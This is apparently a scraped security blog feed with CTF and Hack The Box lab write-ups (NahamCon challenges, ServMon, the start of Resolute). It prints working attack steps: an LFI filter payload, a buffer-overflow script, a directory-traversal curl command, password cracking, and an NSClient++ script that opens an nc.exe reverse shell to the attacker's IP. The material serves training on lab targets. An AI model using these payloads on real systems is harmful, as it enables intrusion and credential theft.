<span class="nt"><div></span>
<span class="nt"><form</span> <span class="na">method=</span><span class="s">"POST"</span> <span class="na">action=</span><span class="s">"#"</span><span class="nt">></span>
<span class="nt"><label</span> <span class="na">id=</span><span class="s">"form_label"</span><span class="nt">></span>Enter number: <span class="nt"></label></span>
<span class="nt"><input</span> <span class="na">type=</span><span class="s">"text"</span> <span class="na">name=</span><span class="s">"number"</span><span class="nt">></span>
<span class="nt"><input</span> <span class="na">type=</span><span class="s">"submit"</span> <span class="na">value=</span><span class="s">"Submit"</span><span class="nt">></span>
<span class="nt"></form></span>
<span class="nt"></div></span>
<span class="nt"><div</span> <span class="na">id=</span><span class="s">"php_container"</span><span class="nt">></span>
<span class="cp"><?php</span>
<span class="nb">extract</span><span class="p">(</span><span class="nv">$_POST</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="k">isset</span><span class="p">(</span><span class="nv">$emergency</span><span class="p">)){</span>
<span class="k">echo</span><span class="p">(</span><span class="nb">file_get_contents</span><span class="p">(</span><span class="s2">"/flag.txt"</span><span class="p">));</span>
<span class="p">}</span>
<span class="cp">?></span>
<span class="nt"></div></span>
<span class="nt"></br></span>
<span class="nt"></br></span>
<span class="nt"></br></span>
<span class="nt"></body></span>
<span class="nt"></html></span>
</code></pre></div></div>
<p>From the code we learn that flag.txt will be read if the emergency variable is set, however it doesn’t matter what this is set too.</p>
<p>We can use BurpSuite to add the line <code class="language-plaintext highlighter-rouge">emergency=123</code> to the body of the POST request to phphonebook.php which will return the flag.</p>
<hr />
<h2 id="binary-exploitation">Binary Exploitation</h2>
<h3 id="dangerous">Dangerous</h3>
<ul>
<li>Clue: Hey! Listen!</li>
<li>Points: 75</li>
<li>Solves: 255</li>
</ul>
<p>We are given an nc session to join <code class="language-plaintext highlighter-rouge">nc jh2i.com 50011</code> and a binary to download called dangerous.
When we run dangerous it asks for a name and then prints the name along with an ascii sword</p>
<p><img src="https://jdmce.com/assets/Nahamconctf/dangerous.jpg" alt="Its dangerous to go alone" /></p>
<p>First step is to cause a segmentation fault by overflowing the buffer, to this just input a large number of characters, I started with 100 and increased from there. At 500 we get our segmentation fault.</p>
<p><img src="https://jdmce.com/assets/Nahamconctf/segfault.jpg" alt="segfault" /></p>
<p>We can use pattern_create and pattern_offset from msf to find the correct input length, which is 497.</p>
<p>The next step is to identify a vulnerable function. Using Ghidra I found a function at <code class="language-plaintext highlighter-rouge">0x0040130e</code> which reads ./flag.txt and outputs it.</p>
<p>We can now get the flag with the following:</p>
<div class="language-py highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">#!/usr/bin/python
</span>
<span class="n">vulnfunc</span> <span class="o">=</span> <span class="s">'</span><span class="se">\x0e\x13\x40\x00\x00\x00\x00\x00</span><span class="s">'</span>
<span class="n">buff</span> <span class="o">=</span> <span class="s">'A'</span> <span class="o">*</span> <span class="mi">497</span>
<span class="k">print</span> <span class="n">buff</span> <span class="o">+</span> <span class="n">vulnfunc</span>
</code></pre></div></div>
<p><img src="https://jdmce.com/assets/Nahamconctf/dangerflag.jpg" alt="DangerFlag" /></p>
<hr />
<h2 id="misc">Misc</h2>
<h3 id="vortex">Vortex</h3>
<ul>
<li>Clue: Will you find the flag, or get lost in the vortex?</li>
<li>Points: 75</li>
<li>Solves: 582</li>
</ul>
<p>When we connect the output looks like random characters (like cat /dev/urandom).</p>
<p>We can redirect the output to a file then grep for the flag.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code> nc jh2i.com 50017 <span class="o">></span> vortex.txt
</code></pre></div></div>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="nb">cat </span>vortex.txt | <span class="nb">grep </span>flag
flag<span class="o">{</span>more_text_in_the_vortex<span class="o">}</span>
</code></pre></div></div>
<hr />
<h3 id="fake-file">Fake File</h3>
<ul>
<li>Clue: Wait… where is the flag?</li>
<li>Points: 100</li>
<li>Solves: 521</li>
</ul>
<p>We connect to <code class="language-plaintext highlighter-rouge">nc jh2i.com 50026</code> We run ls -la to see all files, there seems to be a file named ..</p>
<p>If we highlight and copy the line then look at it as hex we see the filename contains characters outside the ascii table, the filename in hex is <code class="language-plaintext highlighter-rouge">2e 2e e2 80 80</code>.</p>
<p>If we simply copy and paste the filename we can use cat:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>user@host:/home/user<span class="nv">$ </span><span class="nb">cat</span> ..
<span class="nb">cat</span> ..
flag<span class="o">{</span>we_should_have_been_worried_about_u2k_not_y2k<span class="o">}</span>
</code></pre></div></div>
<hr />
<h2 id="stegonography">Stegonography</h2>
<h3 id="ksteg">Ksteg</h3>
<ul>
<li>Clue: This must be a typo…. it was kust one letter away!</li>
<li>Points: 50</li>
<li>Solves: 383</li>
</ul>
<p>We are given an image</p>
<p><img src="https://jdmce.com/assets/Nahamconctf/luke.jpg" alt="luke" /></p>
<p>The challenge name and clue suggest we use a common stegonography tool called Jsteg</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>go run cmd/jsteg/main.go reveal luke.jpg
flag<span class="o">{</span>yeast_bit_stegonography_oops_another_typo<span class="o">}</span>
</code></pre></div></div>
<hr />
<h3 id="doh">Doh</h3>
<ul>
<li>Clue: Doh! Stupid steganography… Note, this flag is not in the usual format.</li>
<li>Points: 50</li>
<li>Solves: 516</li>
</ul>
<p><img src="https://jdmce.com/assets/Nahamconctf/doh.jpg" alt="Doh!" /></p>
<p>This time running steghide extract with no password will find flag.txt</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>steghide extract <span class="nt">-sf</span> doh.jpg
<span class="nb">cat </span>flag.txt
JCTF<span class="o">{</span>an_annoyed_grunt<span class="o">}</span>
</code></pre></div></div>
<hr />
<h2 id="osint">OSINT</h2>
<h3 id="finsta">Finsta</h3>
<ul>
<li>Clue: This time we have a username. Can you track down NahamConTron?</li>
<li>Points: 50</li>
<li>Solves: 702</li>
</ul>
<p>The challenge name suggests Instagram, so I looked up the username and the flag is in the account’s bio.</p>
<p><img src="https://jdmce.com/assets/Nahamconctf/insta.jpg" alt="Insta" /></p>
<hr />
<h2 id="warmup">Warmup</h2>
<h3 id="clisay">CLIsay</h3>
<ul>
<li>Clue: cowsay is hiding something from us!</li>
<li>Points: 20</li>
<li>Solves: 1908</li>
</ul>
<p>We are given a binary. Running it gives us:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> __________________________________
/ Sorry, I'm not allow to reveal any \
\ secrets... /
----------------------------------
\ ^__^
\ (oo)\_______
(__)\ )\/\
||----w |
|| ||
</code></pre></div></div>
<p>Use strings to find the flag</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>strings clisay
...
flag{Y0u_c4n_
__________________________________
/ Sorry, I'm not allow to reveal any \
\ secrets... /
----------------------------------
\ ^__^
\ (oo)\_______
(__)\ )\/\
||----w |
|| ||
r3Ad_M1nd5}
...
</code></pre></div></div>
<p>Note: Using grep will only find the first half of the flag</p>
<hr />
<h3 id="metameme">Metameme</h3>
<ul>
<li>Clue: Hacker memes. So meta.</li>
<li>Points: 25</li>
<li>Solves: 2019</li>
</ul>
<p><img src="https://jdmce.com/assets/Nahamconctf/hackermeme.jpg" alt="HackerMeme" /></p>
<p>Running strings on the image will give us the flag</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>strings hackermeme.jpg | <span class="nb">grep </span>flag
<rdf:li>flag<span class="o">{</span>N0t_7h3_4cTuaL_Cr3At0r<span class="o">}</span></rdf:li>
</code></pre></div></div>
<hr />
<h3 id="mr-robot">Mr. Robot</h3>
<ul>
<li>Clue: Elliot needs your help. You know what to do.</li>
<li>Points: 25</li>
<li>Solves: 1581</li>
</ul>
<p><a href="http://jh2i.com:50032/">jh2i.com:50032</a> A static webpage. The flag is in robots.txt
<a href="http://jh2i.com:50032/robots.txt">http://jh2i.com:50032/robots.txt</a></p>
<hr />
<h3 id="uggc">UGGC</h3>
<ul>
<li>Clue: Become the admin!</li>
<li>Points: 30</li>
<li>Solves: 1310</li>
</ul>
<p>If we edit the cookie on the page to set user to admin, we get “you are logged in as nqzva.” This is the rot 13 of admin, so setting the cookie to nqzva and refreshing will give us the flag.</p>
<p><img src="https://jdmce.com/assets/Nahamconctf/admin.jpg" alt="admin" /></p>
<hr />
<h3 id="easy-keesy">Easy Keesy</h3>
<ul>
<li>Clue: Dang it, not again…</li>
<li>Points: 30</li>
<li>Solves: 670</li>
</ul>
<p>We are given a keepass database file. We can crack the password using john.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>keepass2john easy_keesy <span class="o">></span> keehash
john <span class="nt">-format</span>:keepass <span class="nt">--wordlist</span><span class="o">=</span>/usr/share/wordlists/rockyou.txt keehash
</code></pre></div></div>
<p>The password is monkey, We can open the database in keepass to get the flag.</p>
<hr />
<h3 id="pang">Pang</h3>
<p>I used PCRT to fix the image</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>python PCRT.py <span class="nt">-i</span> pang.png <span class="nt">-o</span> pong.png
</code></pre></div></div>
<p><img src="https://jdmce.com/assets/Nahamconctf/pong.png" alt="pong" /></p>John McEwanNahamcon CTF was an online CTF even held on June 12th-13th. Unfortunately I was only able to dedicate a few hours so I focused on the easier challenges. Web Agent 95 Clue: They’ve given you a number, and taken away your name~ Points: 50 Solves: 1788 The Web page gives us the following message: You don’t look like our agent! We will only give our flag to our Agent 95! He is still running an old version of Windows… I used BurpSuite to change the User agent to Mozilla/4.0 (compatible; MSIE 4.0; Windows 95) which I got from useragentstring.com. The response is the flag. Localghost Clue: BooOooOooOOoo! This spooOoOooky client-side cooOoOode sure is scary! What spoOoOoOoky secrets does he have in stooOoOoOore?? Points: 75 Solves: 1375 The web page has an ascii art ghost, which scrolls infinitely. By looking at the source code we find that the infinite scrolling is done using javascript /jquery.jscroll2.js. The javascript is obfuscated var _0xbcec=["\x75\x73\x65\x20\x73\x74\x72\x69\x63\x74","\x6A\x73\x63\x72\x6F\x6C\x6C","\x3C\x73\x6D\x61\x6C\x6C\x3E\x4C\x6F\x61\x64\x69\x6E\x67\x2E\x2E\x2E\x3C\x2F\x73\x6D\x61\x6C\x6C\x3E","\x61\x3A\x6C\x61\x73\x74","","\x66\x6C\x61\x67","\x53\x6B\x4E\x55\x52\x6E\x74\x7A\x63\x47\x39\x76\x62\x32\x39\x76\x61\x33\x6C\x66\x5A\x32\x68\x76\x63\x33\x52\x7A\x58\x32\x6C\x75\x58\x33\x4E\x30\x62\x33\x4A\x68\x5A\x32\x56\x39","\x73\x65\x74\x49\x74\x65\x6D","\x6C\x6F\x63\x61\x6C\x53\x74\x6F\x72\x61\x67\x65","\x64\x61\x74\x61","\x66\x75\x6E\x63\x74\x69\x6F\x6E","\x64\x65\x66\x61\x75\x6C\x74\x73","\x65\x78\x74\x65\x6E\x64","\x6F\x76\x65\x72\x66\x6C\x6F\x77\x2D\x79","\x63\x73\x73","\x76\x69\x73\x69\x62\x6C\x65","\x66\x69\x72\x73\x74","\x6E\x65\x78\x74\x53\x65\x6C\x65\x63\x74\x6F\x72","\x66\x69\x6E\x64","\x62\x6F\x64\x79","\x68\x72\x65\x66","\x61\x74\x74\x72", ... I used beautifier.io to de-obfuscate the code. (function(_0xe943x1) { 'use strict'; _0xe943x1['jscroll'] = { defaults: { debug: false, autoTrigger: true, autoTriggerUntil: false, loadingHtml: '<small>Loading...</small>', padding: 0, nextSelector: 'a:last', contentSelector: '', pagingSelector: '', callback: false } }; window['localStorage']['setItem']('flag', atob('SkNURntzcG9vb29va3lfZ2hvc3RzX2luX3N0b3JhZ2V9')); var _0xe943x2 = function(_0xe943x3, _0xe943x4) { var _0xe943x5 = _0xe943x3['data']('jscroll'), _0xe943x6 = (typeof _0xe943x4 === 'function') ? { callback: _0xe943x4 } : _0xe943x4, _0xe943x7 = _0xe943x1['extend']({}, _0xe943x1['jscroll']['defaults'], _0xe943x6, _0xe943x5 || {}), _0xe943x8 = (_0xe943x3['css']('overflow-y') === 'visible'), _0xe943x9 = _0xe943x3['find'](_0xe943x7['nextSelector'])['first'](), _0xe943xa = _0xe943x1(window), _0xe943xb = _0xe943x1('body'), _0xe943xc = _0xe943x8 ? _0xe943xa : _0xe943x3, _0xe943xd = _0xe943x1['trim'](_0xe943x9['attr']('href') + ' ' + _0xe943x7['contentSelector']), _0xe943xe = function() { var _0xe943x17 = _0xe943x1(_0xe943x7['loadingHtml'])['filter']('img')['attr']('src'); if (_0xe943x17) { var _0xe943x18 = new Image(); _0xe943x18['src'] = _0xe943x17 } }, ... The code sets the item “flag” to the string SkNURntzcG9vb29va3lfZ2hvc3RzX2luX3N0b3JhZ2V9 if we base64 decode this string we get the flag. Another way to solve this challenge is to simply use chrome dev tools, where the flag is stored in Local Storage. PhphoneBook Clue: Ring ring! Need to look up a number? This phonebook has got you covered! But you will only get a flag if it is an emergency! Points: 100 Solves: 561 The web page gives us the following: Sorry! You are in /index.php/?file= The phonebook is located at phphonebook.php I first tried going directly to phphonebook.php and got the following page: I then tried going to /index.php/?file=phphonebook.php and got the same page. I realised quickly that it was a local file inclusion, but spent too long trying to look for other files, like a flag.php, which doesn’t exist. Eventually I realised / remembered that I might be able to get the contents of phphonebook.php by using base64 encoding. http://jh2i.com:50002/index.php?file=php://filter/convert.base64-encode/resource=phphonebook.php It works! This gives us the contents of phphonebook.php encoded in base64. Decoding it gives us the following code: <!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <title>Phphonebook</title> <link href="main.css" rel="stylesheet"> </head> <body class="bg"> <h1 id="header"> Welcome to the Phphonebook </h1> <div id="im_container"> <img src="book.jpg" width="50%" height="30%"/> <p class="desc"> This phphonebook was made to look up all sorts of numbers! Have fun... </p> </div> <br> <br> <div> <form method="POST" action="#"> <label id="form_label">Enter number: </label> <input type="text" name="number"> <input type="submit" value="Submit"> </form> </div> <div id="php_container"> <?php extract($_POST); if (isset($emergency)){ echo(file_get_contents("/flag.txt")); } ?> </div> </br> </br> </br> </body> </html> From the code we learn that flag.txt will be read if the emergency variable is set, however it doesn’t matter what this is set too. We can use BurpSuite to add the line emergency=123 to the body of the POST request to phphonebook.php which will return the flag. Binary Exploitation Dangerous Clue: Hey! Listen! Points: 75 Solves: 255 We are given an nc session to join nc jh2i.com 50011 and a binary to download called dangerous. When we run dangerous it asks for a name and then prints the name along with an ascii sword First step is to cause a segmentation fault by overflowing the buffer, to this just input a large number of characters, I started with 100 and increased from there. At 500 we get our segmentation fault. We can use pattern_create and pattern_offset from msf to find the correct input length, which is 497. The next step is to identify a vulnerable function. Using Ghidra I found a function at 0x0040130e which reads ./flag.txt and outputs it. We can now get the flag with the following: #!/usr/bin/python vulnfunc = '\x0e\x13\x40\x00\x00\x00\x00\x00' buff = 'A' * 497 print buff + vulnfunc Misc Vortex Clue: Will you find the flag, or get lost in the vortex? Points: 75 Solves: 582 When we connect the output looks like random characters (like cat /dev/urandom). We can redirect the output to a file then grep for the flag. nc jh2i.com 50017 > vortex.txt cat vortex.txt | grep flag flag{more_text_in_the_vortex} Fake File Clue: Wait… where is the flag? Points: 100 Solves: 521 We connect to nc jh2i.com 50026 We run ls -la to see all files, there seems to be a file named .. If we highlight and copy the line then look at it as hex we see the filename contains characters outside the ascii table, the filename in hex is 2e 2e e2 80 80. If we simply copy and paste the filename we can use cat: user@host:/home/user$ cat .. cat .. flag{we_should_have_been_worried_about_u2k_not_y2k} Stegonography Ksteg Clue: This must be a typo…. it was kust one letter away! Points: 50 Solves: 383 We are given an image The challenge name and clue suggest we use a common stegonography tool called Jsteg go run cmd/jsteg/main.go reveal luke.jpg flag{yeast_bit_stegonography_oops_another_typo} Doh Clue: Doh! Stupid steganography… Note, this flag is not in the usual format. Points: 50 Solves: 516 This time running steghide extract with no password will find flag.txt steghide extract -sf doh.jpg cat flag.txt JCTF{an_annoyed_grunt} OSINT Finsta Clue: This time we have a username. Can you track down NahamConTron? Points: 50 Solves: 702 The challenge name suggests Instagram, so I looked up the username and the flag is in the account’s bio. Warmup CLIsay Clue: cowsay is hiding something from us! Points: 20 Solves: 1908 We are given a binary. Running it gives us: __________________________________ / Sorry, I'm not allow to reveal any \ \ secrets... / ---------------------------------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || Use strings to find the flag strings clisay ... flag{Y0u_c4n_ __________________________________ / Sorry, I'm not allow to reveal any \ \ secrets... / ---------------------------------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || r3Ad_M1nd5} ... Note: Using grep will only find the first half of the flag Metameme Clue: Hacker memes. So meta. Points: 25 Solves: 2019 Running strings on the image will give us the flag strings hackermeme.jpg | grep flag <rdf:li>flag{N0t_7h3_4cTuaL_Cr3At0r}</rdf:li> Mr. Robot Clue: Elliot needs your help. You know what to do. Points: 25 Solves: 1581 jh2i.com:50032 A static webpage. The flag is in robots.txt http://jh2i.com:50032/robots.txt UGGC Clue: Become the admin! Points: 30 Solves: 1310 If we edit the cookie on the page to set user to admin, we get “you are logged in as nqzva.” This is the rot 13 of admin, so setting the cookie to nqzva and refreshing will give us the flag. Easy Keesy Clue: Dang it, not again… Points: 30 Solves: 670 We are given a keepass database file. We can crack the password using john. keepass2john easy_keesy > keehash john -format:keepass --wordlist=/usr/share/wordlists/rockyou.txt keehash The password is monkey, We can open the database in keepass to get the flag. Pang I used PCRT to fix the image python PCRT.py -i pang.png -o pong.png[HTB] Servmon WriteUp2020-06-15T20:34:30+01:002020-06-15T20:34:30+01:00https://jdmce.com/hack%20the%20box/%5BHTB%5D-ServMon-WriteUp<p><img src="https://jdmce.com/assets/servmon/servmon.jpg" alt="" /></p>
<ul>
<li>OS: Windows</li>
<li>Difficulty: Easy</li>
<li>Points: 20</li>
<li>Release: 11 Apr 2020</li>
<li>IP: 10.10.10.184</li>
</ul>
<p>Lets start by running nmap</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>nmap <span class="nt">-sC</span> <span class="nt">-sV</span> <span class="nt">-oN</span> nmap/nmap 10.10.10.184
</code></pre></div></div>
<p>Output:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># Nmap 7.80 scan initiated Tue May 5 19:41:18 2020 as: nmap -sV -sC -oN nmap/nmap 10.10.10.184</span>
Nmap scan report <span class="k">for </span>10.10.10.184
Host is up <span class="o">(</span>0.024s latency<span class="o">)</span><span class="nb">.</span>
Not shown: 991 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed <span class="o">(</span>FTP code 230<span class="o">)</span>
|_01-18-20 12:05PM <DIR> Users
| ftp-syst:
|_ SYST: Windows_NT
22/tcp open ssh OpenSSH for_Windows_7.7 <span class="o">(</span>protocol 2.0<span class="o">)</span>
| ssh-hostkey:
| 2048 b9:89:04:ae:b6:26:07:3f:61:89:75:cf:10:29:28:83 <span class="o">(</span>RSA<span class="o">)</span>
| 256 71:4e:6c:c0:d3:6e:57:4f:06:b8:95:3d:c7:75:57:53 <span class="o">(</span>ECDSA<span class="o">)</span>
|_ 256 15:38:bd:75:06:71:67:7a:01:17:9c:5c:ed:4c:de:0e <span class="o">(</span>ED25519<span class="o">)</span>
80/tcp open http
| fingerprint-strings:
| GetRequest, HTTPOptions, RTSPRequest:
| HTTP/1.1 200 OK
| Content-type: text/html
| Content-Length: 340
| Connection: close
| AuthInfo:
| <<span class="o">!</span>DOCTYPE html PUBLIC <span class="s2">"-//W3C//DTD XHTML 1.0 Transitional//EN"</span> <span class="s2">"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"</span><span class="o">></span>
| <html <span class="nv">xmlns</span><span class="o">=</span><span class="s2">"http://www.w3.org/1999/xhtml"</span><span class="o">></span>
| <<span class="nb">head</span><span class="o">></span>
| <title></title>
| <script <span class="nb">type</span><span class="o">=</span><span class="s2">"text/javascript"</span><span class="o">></span>
| window.location.href <span class="o">=</span> <span class="s2">"Pages/login.htm"</span><span class="p">;</span>
| </script>
| </head>
| <body>
| </body>
| </html>
| NULL:
| HTTP/1.1 408 Request Timeout
| Content-type: text/html
| Content-Length: 0
| Connection: close
|_ AuthInfo:
|_http-title: Site doesnt have a title <span class="o">(</span>text/html<span class="o">)</span><span class="nb">.</span>
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
5666/tcp open tcpwrapped
6699/tcp open tcpwrapped
8443/tcp open ssl/https-alt
| fingerprint-strings:
| FourOhFourRequest, HTTPOptions, RTSPRequest, SIPOptions:
| HTTP/1.1 404
| Content-Length: 18
| Document not found
| GetRequest:
| HTTP/1.1 302
| Content-Length: 0
|_ Location: /index.html
| http-title: NSClient++
|_Requested resource was /index.html
| ssl-cert: Subject: <span class="nv">commonName</span><span class="o">=</span>localhost
| Not valid before: 2020-01-14T13:24:20
|_Not valid after: 2021-01-13T13:24:20
|_ssl-date: TLS randomness does not represent <span class="nb">time
</span>2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
...
Service Info: OS: Windows<span class="p">;</span> CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 4m16s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| <span class="nb">date</span>: 2020-05-05T18:47:18
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ <span class="nb">.</span>
<span class="c"># Nmap done at Tue May 5 19:43:07 2020 -- 1 IP address (1 host up) scanned in 108.77 seconds</span>
</code></pre></div></div>
<p>FTP is running and allows anonymous login.
There are two users listed on the FTP server, Nadine and Nathan. We also find tome text files, “Notes to do”.txt and Confidential.txt</p>
<p>Confidential.txt reads</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Nathan,
I left your Passwords.txt file on your Desktop.
Please remove this once you have edited it yourself and place it back into the secure folder.
Regards
Nadine
</code></pre></div></div>
<p>The webserver is running NVMS-1000, searching for exploits we find <a href="https://www.exploit-db.com/exploits/48311">CVE:2019-20085</a> which is a directory traversal. We can use this to find the passwords.txt that the note told us about.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>curl <span class="nt">--path-as-is</span> <span class="nt">-G</span> http://10.10.10.184/../../../../../../../../Users/Nathan/Desktop/passwords.txt
</code></pre></div></div>
<p>This gives us a list of passwords</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$
</code></pre></div></div>
<p>We can try SSH with these passwords against both known users. The password L1k3B1gBut7s@W0rk works with Nadine.</p>
<p>We log in as Nadine and find User.txt on the Desktop.</p>
<h3 id="privesc">PrivEsc</h3>
<p>This part took me a long time to do, mostly due to the GUI interface. I eventually done it using the <a href="https://docs.nsclient.org/api/">web API</a>.</p>
<p>Port 8443 is running NSClient++.</p>
<p>We can find the password for NSClient++ by going to C:\Program Files\NSClient++ and using the following command</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>nscp web <span class="nt">--password</span> <span class="nt">--display</span>
Current password: ew2x6SsGTxjRwXOT
</code></pre></div></div>
<p>We can try logging in using this password but it will only allow connections from localhost. SSH has port forwarding built in so log in as Nadine with port forwarding enabled.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ssh <span class="nt">-L</span> 8443:127.0.0.1:8443 Nadine@10.10.10.184
</code></pre></div></div>
<p>Now we can use the web API to add a malicious script and execute it to gain root privileges.</p>
<p>First we need to upload nc.exe to C:/Temp. Then use the following command to add our script.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>curl <span class="nt">-s</span> <span class="nt">-k</span> <span class="nt">-u</span> admin <span class="nt">-X</span> PUT https://localhost:8443/api/v1/scripts/ext/scripts/evil.bat <span class="nt">--data-binary</span> <span class="s2">"C:</span><span class="se">\T</span><span class="s2">emp</span><span class="se">\n</span><span class="s2">c.exe 10.10.14.33 9001 -e cmd.exe"</span>
</code></pre></div></div>
<p>When run this will call back to our IP address. Set up a listener on the attacking machine.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>nc <span class="nt">-lvnp</span> 9001
</code></pre></div></div>
<p>Then run the script</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>curl <span class="nt">-s</span> <span class="nt">-k</span> <span class="nt">-u</span> admin https://localhost:8443/api/v1/queries/evil/commands/execute?time<span class="o">=</span>1m
</code></pre></div></div>
<p>This should connect back and give us root!</p>
<p>Root.txt is in C:\Users\Administrator\Desktop\root.txt</p>John McEwanLets start by running nmap. FTP is running and allows anonymous login.[HTB] Resolute WriteUp2020-05-30T20:34:30+01:002020-05-30T20:34:30+01:00https://jdmce.com/hack%20the%20box/%5BHTB%5D-Resolute-WriteUp<p><img src="https://jdmce.com/assets/resolute/resolute.jpg" alt="Resolute" /></p>
<ul>
<li>OS: Windows</li>
<li>Difficulty: Medium</li>
<li>Points: 30</li>
<li>Release: 07 Dec 2019</li>
<li>IP: 10.10.10.169</li>
</ul>
<p>Lets start by running nmap</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>nmap <span class="nt">-sC</span> <span class="nt">-sV</span> <span class="nt">-oN</span> nmap/nmap 10.10.10.169
</code></pre></div></div>
<p>Output:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Nmap scan report for 10.10.10.169
Host is up (0.029s latency).
Not shown: 989 closed ports
PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-05-21 19:35:50Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=5/21%Time=5EC6D580%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: RESOLUTE; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 2h31m07s, deviation: 4h02m30s, median: 11m06s
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: Resolute
| NetBIOS computer name: RESOLUTE\x00
| Domain name: megabank.local
| Forest name: megabank.local
| FQDN: Resolute.megabank.local
|_ System time: 2020-05-21T12:36:03-07:00
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-05-21T19:36:05
|_ start_date: 2020-05-21T19:32:42
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu May 21 20:26:33 2020 -- 1 IP address (1 host up) scanned in 117.39 seconds
</code></pre></div></div>
<p>There is no website running on port 80, this machine is going to be entirely Active Directory. It looks like the machine is an Active Directory Domain controller.</p>
<p>Let’s continue enumerating. Use enum4linux to gather more info from the machine.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>enum4linux 10.10.10.169
Starting enum4linux v0.8.9 <span class="o">(</span> http://labs.portcullis.co.uk/application/enum4linux/ <span class="o">)</span> on Thu May 21 20:35:17 2020
<span class="o">==========================</span>
| Target Information |
<span class="o">==========================</span>
Target ........... 10.10.10.169
RID Range ........ 500-550,1000-1050
Username ......... <span class="s1">''</span>
Password ......... <span class="s1">''</span>
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
<span class="o">=============================</span>
| Users on 10.10.10.169 |
<span class="o">=============================</span>
Use of uninitialized value <span class="nv">$global_workgroup</span> <span class="k">in </span>concatenation <span class="o">(</span>.<span class="o">)</span> or string at ./enum4linux.pl line 866.
index: 0x10b0 RID: 0x19ca acb: 0x00000010 Account: abigail Name: <span class="o">(</span>null<span class="o">)</span> Desc: <span class="o">(</span>null<span class="o">)</span>
index: 0xfbc RID: 0x1f4 acb: 0x00000210 Account: Administrator Name: <span class="o">(</span>null<span class="o">)</span> Desc: Built-in account <span class="k">for </span>administering the computer/domain
index: 0x10b4 RID: 0x19ce acb: 0x00000010 Account: angela Name: <span class="o">(</span>null<span class="o">)</span> Desc: <span class="o">(</span>null<span class="o">)</span>
index: 0x10bc RID: 0x19d6 acb: 0x00000010 Account: annette Name: <span class="o">(</span>null<span class="o">)</span> Desc: <span class="o">(</span>null<span class="o">)</span>
